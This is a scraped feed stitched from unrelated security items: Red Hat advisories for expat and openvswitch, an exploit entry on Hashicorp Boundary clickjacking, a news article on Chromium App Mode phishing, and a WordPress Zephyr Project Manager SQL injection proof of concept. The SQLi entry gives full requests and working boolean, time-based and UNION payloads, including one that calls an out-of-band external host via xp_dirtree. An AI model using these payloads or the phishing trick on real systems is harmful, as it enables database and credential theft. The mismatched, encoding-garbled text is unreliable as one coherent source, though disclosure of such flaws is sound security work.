expat-debugsource-2.2.5-3.el8_1.2.x86_64.rpm  
expat-devel-2.2.5-3.el8_1.2.i686.rpm  
expat-devel-2.2.5-3.el8_1.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz7sntzjgjWX9erEAQilzg/9G0hBlNyYGAOEQ2Wd1hoaviKz1x8xQSjk  
6Yp8hYteJ8barDPVG6ZSkOzK0EgwOU2BZem6D8s4jTF3SjYokQlC5qleON1kbV6v  
uegK8apoBsByZZVbpL3ioMcwT0jvoMJkmUhOrQmd8ijnWWBcQsmwVBCP8ej/YJcd  
ugtcxE9GIaXt/KCDg04ly+NaB21Ej2bvHC9IglajZyFglLESCs9aufQcEUIyyYN5  
KHjLdIxmUvs61FsROSB4GH22OABH6v7JAZwIQB3bVr1HVSpU6eUU2ug+DN/sELtk  
0wLZWTUk09V6I2uzF3Og40qsOUmgik5CSbeNrP5j/QAYz7Fys2HYs+ybx9zIMmlw  
t72+MCZO911IxV+CV2ev5qjluOgDcNDWJJVsvjSdiMpsK6d1xe7t224MYqHJLV5v  
93fRMoL//MmF0OMcgNrR8ijooUq1WrxJBIjQQ+imyNezvjevYPnWcl2sfTJIBZAH  
UHblj3RmjTmg9qEl/hxsWqYO+7o7CqzJ49nPxAzvu/F6SKR56SRZwsZnLt/awXLD  
SfO2ff2jZA7Ruq5kvfspzh9EYlsz4117uRlm4jtYXCtnlsR43v3bDPw50oTEgTvm  
OJMkFOVAN5uVSPttPacD0JaIDpeV26ofSakXknA4+lwle9hP1enX5nQ3qkne06Dq  
7vR0gnLs+t4=0lxG  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6833-01

Hashicorp Boundary versions prior to 0.9.1 suffer from a clickjacking vulnerability.

    # Exploit Title: Hashicorp Boundary < v0.9.1 - Clickjacking# Date: 07/08/2022# Exploit Author: Brandon Roach (V4quero)# Vendor Homepage: https://releases.hashicorp.com/boundary/# Software Link: https://github.com/hashicorp/boundary# Version: < v.0.9.1# Tested on: Linux# CVE: CVE-2022-36182Attackers can exploit this vulnerability to allow for the interception of login credentials, re-direction of users to malicious sites, or causing users to perform malicious actions on the site.Attack vector:to exploit the vulnerability, an attacker would frame the application and overlay hidden ui elements on the siteReferencehttps://owasp.org/www-community/attacks/Clickjacking

Hashicorp Boundary Clickjacking

WordPress Zephyr Project Manager plugin version 3.2.42 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi# Date: 14-08-2022# Exploit Author: Rizacan Tufan# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated# Software Link: https://wordpress.org/plugins/zephyr-project-manager/# Vendor Homepage: https://zephyr-one.com/# Version: 3.2.42# Tested on: Windows, Linux# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)# DescriptionZephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.It has been determined that the data coming from the input field in most places throughout the application are used in=20the query without any sanitize and validation.The details of the discovery are given below.# Proof of Concept (PoC)=20The details of the various SQL Injection on the application are given below.## Endpoint of Get Project Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projectsContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 74Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersaction=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: project_id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7    Type: time-based blind    Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP)    Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7    Type: UNION query    Title: Generic UNION query (NULL) - 20 columns    Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7---## Endpoint of Get Task Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 51Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_id (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7---## Endpoint of New Task.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 337Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_project (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7---

WordPress Zephyr Project Manager 3.2.42 SQL Injection

In what's a new phishing technique, it has been demonstrated that the Application Mode feature in Chromium-based web browsers can be abused to create "realistic desktop phishing applications."
Application Mode is designed to offer native-like experiences in a manner that causes the website to be launched in a separate browser window, while also displaying the website's favicon and hiding the

In what's a new phishing technique, it has been demonstrated that the Application Mode feature in Chromium-based web browsers can be abused to create "realistic desktop phishing applications."

Application Mode is designed to offer native-like experiences in a manner that causes the website to be launched in a separate browser window, while also displaying the website's favicon and hiding the address bar.

According to security researcher mr.d0x – who also devised the browser-in-the-browser (BitB) attack method earlier this year – a bad actor can leverage this behavior to resort to some HTML/CSS trickery and display a fake address bar on top of the window and fool users into giving up their credentials on rogue login forms.

"Although this technique is meant more towards internal phishing, you can technically still use it in an external phishing scenario," mr.d0x said. "You can deliver these fake applications independently as files."

This is achieved by setting up a phishing page with a fake address bar at the top, and configuring the \--app parameter to point to the phishing site hosting the page.

On top of that, the attacker-controlled phishing site can make use of JavaScript to take more actions, such as closing the window immediately after the user enters the credentials or resizing and positioning it to achieve the desired effect.

It's worth noting that the mechanism works on other operating systems, such as macOS and Linux, making it a potential cross-platform threat. However, the success of the attack is predicated on the fact that the attacker already has access to the target's machine.

That said, Google is phasing out support for Chrome apps in favor of Progressive Web Apps (PWAs) and web-standard technologies, and the feature is expected to be fully discontinued in Chrome 109 or later on Windows, macOS, and Linux.

The findings come as new findings Trustwave SpiderLabs show that HTML smuggling attacks are a common occurrence, with .HTML (11.39%) and .HTM (2.7%) files accounting for the second most spammed file attachment type after .JPG images (25.29%).

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Can Use 'App Mode' in Chromium Browsers' for Stealth Phishing Attacks

An update for openvswitch2.11 is now available for Fast Datapath for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-2132: dpdk: DoS when a Vhost header crosses more than two descriptors and exhausts all mbufs


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-10-06

Updated:

2022-10-06

**RHSA-2022:6850 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: openvswitch2.11 security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for openvswitch2.11 is now available for Fast Datapath for Red Hat Enterprise Linux 7.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.  

Security Fix(es):  

*   dpdk: DoS when a Vhost header crosses more than two descriptors and exhausts all mbufs (CVE-2022-2132)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat Enterprise Linux Fast Datapath 7 x86\_64
*   Red Hat Enterprise Linux Fast Datapath (for RHEL Server for IBM Power LE) 7 ppc64le
*   Red Hat Enterprise Linux Fast Datapath (for IBM z Systems) 7 s390x

**Fixes**

*   BZ - 2099475 - CVE-2022-2132 dpdk: DoS when a Vhost header crosses more than two descriptors and exhausts all mbufs

**Red Hat Enterprise Linux Fast Datapath 7**

SRPM

openvswitch2.11-2.11.3-96.2.el7fdp.src.rpm

SHA-256: 98a5596aa9f5ae57989b9913d63179191969c79f87fd279b9254987d557d2eb2

x86\_64

openvswitch2.11-2.11.3-96.2.el7fdp.x86\_64.rpm

SHA-256: d768fb6deb0bde432c11ae1e327874cc68b93929a05060c59b968730ebc24260

openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.x86\_64.rpm

SHA-256: e5484c53459e01f7ed35a4d2d46772c85f2b533e729dff741a85725135526b3f

openvswitch2.11-devel-2.11.3-96.2.el7fdp.x86\_64.rpm

SHA-256: 33fc18bc108bf8f5752acac466545d827f205f7c6b4e2d37a11fb135edf8671c

openvswitch2.11-test-2.11.3-96.2.el7fdp.noarch.rpm

SHA-256: 7a126a2c6eb84d9fdcd4425ad0a1b0c9cf30e9569faab0ea43a583b4603ed4b8

python-openvswitch2.11-2.11.3-96.2.el7fdp.x86\_64.rpm

SHA-256: 7d162c5d4bc49f46bfcc4d3e4fdc056c2264aa9c5da2bdb14df736d6d56eb8dc

**Red Hat Enterprise Linux Fast Datapath (for RHEL Server for IBM Power LE) 7**

SRPM

openvswitch2.11-2.11.3-96.2.el7fdp.src.rpm

SHA-256: 98a5596aa9f5ae57989b9913d63179191969c79f87fd279b9254987d557d2eb2

ppc64le

openvswitch2.11-2.11.3-96.2.el7fdp.ppc64le.rpm

SHA-256: 18941eeb178ca225f8f28e06edd3731495c46d465414e20b006b5176fc409025

openvswitch2.11-2.11.3-96.2.el7fdp.ppc64le.rpm

SHA-256: 18941eeb178ca225f8f28e06edd3731495c46d465414e20b006b5176fc409025

openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.ppc64le.rpm

SHA-256: d261260249a8882e32640a89276b0ae5e3e90899670119467b421954c2607502

openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.ppc64le.rpm

SHA-256: d261260249a8882e32640a89276b0ae5e3e90899670119467b421954c2607502

openvswitch2.11-devel-2.11.3-96.2.el7fdp.ppc64le.rpm

SHA-256: 48ced6df812397928cbdbadd363c6fa635172b4e3360c13a2aa5500339c76034

openvswitch2.11-devel-2.11.3-96.2.el7fdp.ppc64le.rpm

SHA-256: 48ced6df812397928cbdbadd363c6fa635172b4e3360c13a2aa5500339c76034

openvswitch2.11-test-2.11.3-96.2.el7fdp.noarch.rpm

SHA-256: 7a126a2c6eb84d9fdcd4425ad0a1b0c9cf30e9569faab0ea43a583b4603ed4b8

openvswitch2.11-test-2.11.3-96.2.el7fdp.noarch.rpm

SHA-256: 7a126a2c6eb84d9fdcd4425ad0a1b0c9cf30e9569faab0ea43a583b4603ed4b8

python-openvswitch2.11-2.11.3-96.2.el7fdp.ppc64le.rpm

SHA-256: e9298f7512385fae5a2569946d9b86a331c1f9699071a64b4abeb54536bd8e64

python-openvswitch2.11-2.11.3-96.2.el7fdp.ppc64le.rpm

SHA-256: e9298f7512385fae5a2569946d9b86a331c1f9699071a64b4abeb54536bd8e64

**Red Hat Enterprise Linux Fast Datapath (for IBM z Systems) 7**

SRPM

openvswitch2.11-2.11.3-96.2.el7fdp.src.rpm

SHA-256: 98a5596aa9f5ae57989b9913d63179191969c79f87fd279b9254987d557d2eb2

s390x

openvswitch2.11-2.11.3-96.2.el7fdp.s390x.rpm

SHA-256: 8ffc78e657abc3515439e3e1cedbc31dde96b4ccf89845c76b640b99a83dbdfb

openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.s390x.rpm

SHA-256: 90659d829c279215ecbc509a13834bc3e11465fcab7b033f6164011bbe71f8c8

openvswitch2.11-devel-2.11.3-96.2.el7fdp.s390x.rpm

SHA-256: 07bb09651ef15be2caae2b419ab25a1caaa1bd5a6543e1045e5cff138075c246

openvswitch2.11-test-2.11.3-96.2.el7fdp.noarch.rpm

SHA-256: 7a126a2c6eb84d9fdcd4425ad0a1b0c9cf30e9569faab0ea43a583b4603ed4b8

python-openvswitch2.11-2.11.3-96.2.el7fdp.s390x.rpm

SHA-256: 6bce0b927af579ec50fc73e1227a713b5e1e9cacc880423e16ad692085ee1061

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

Tag

#linux